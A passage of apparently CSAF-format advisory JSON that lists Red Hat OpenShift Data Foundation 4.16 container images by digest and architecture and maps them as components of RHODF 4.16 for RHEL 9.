"purl": "pkg:oci/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f?arch=arm64\u0026repository_url=registry.redhat.io/odf4/ocs-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"product": {
"name": "odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"product_id": "odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-cli-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"product": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"product_id": "odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"product": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"product_id": "odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"product": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"product_id": "odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"product": {
"name": "odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"product_id": "odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"product": {
"name": "odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"product_id": "odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-rhel9-operator\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"product": {
"name": "odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"product_id": "odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odr-rhel9-operator\u0026tag=v4.16.3-1"
}
}
}
],
"category": "architecture",
"name": "arm64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le"
},
"product_reference": "odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64"
},
"product_reference": "odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x"
},
"product_reference": "odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le"
},
"product_reference": "odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x"
},
"product_reference": "odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64"
},
"product_reference": "odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64"
},
"product_reference": "odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x"
},
"product_reference": "odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64"
},
"product_reference": "odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le"
},
"product_reference": "odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64"
},
"product_reference": "odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le"
},
"product_reference": "odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64"
},
"product_reference": "odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x"
},
"product_reference": "odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x"
},
"product_reference": "odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le"
},
"product_reference": "odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64"
},
"product_reference": "odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64"
},
"product_reference": "odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x"
},
"product_reference": "odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le"
},
"product_reference": "odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le"
},
"product_reference": "odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64"
},
"product_reference": "odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x"
},
"product_reference": "odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64"
},
"product_reference": "odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le"
},
"product_reference": "odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x"
},
"product_reference": "odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64"
},
"product_reference": "odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64"
},
"product_reference": "odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x"
},
"product_reference": "odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le"
},
"product_reference": "odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le"
},
"product_reference": "odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64"
},
"product_reference": "odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64"
},
"product_reference": "odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x"
},
"product_reference": "odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64"
},
"product_reference": "odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x"
},
"product_reference": "odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64"
},
"product_reference": "odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le"
},
"product_reference": "odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64"
},
"product_reference": "odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x as a component of RHODF 4.16 for RHEL 9",
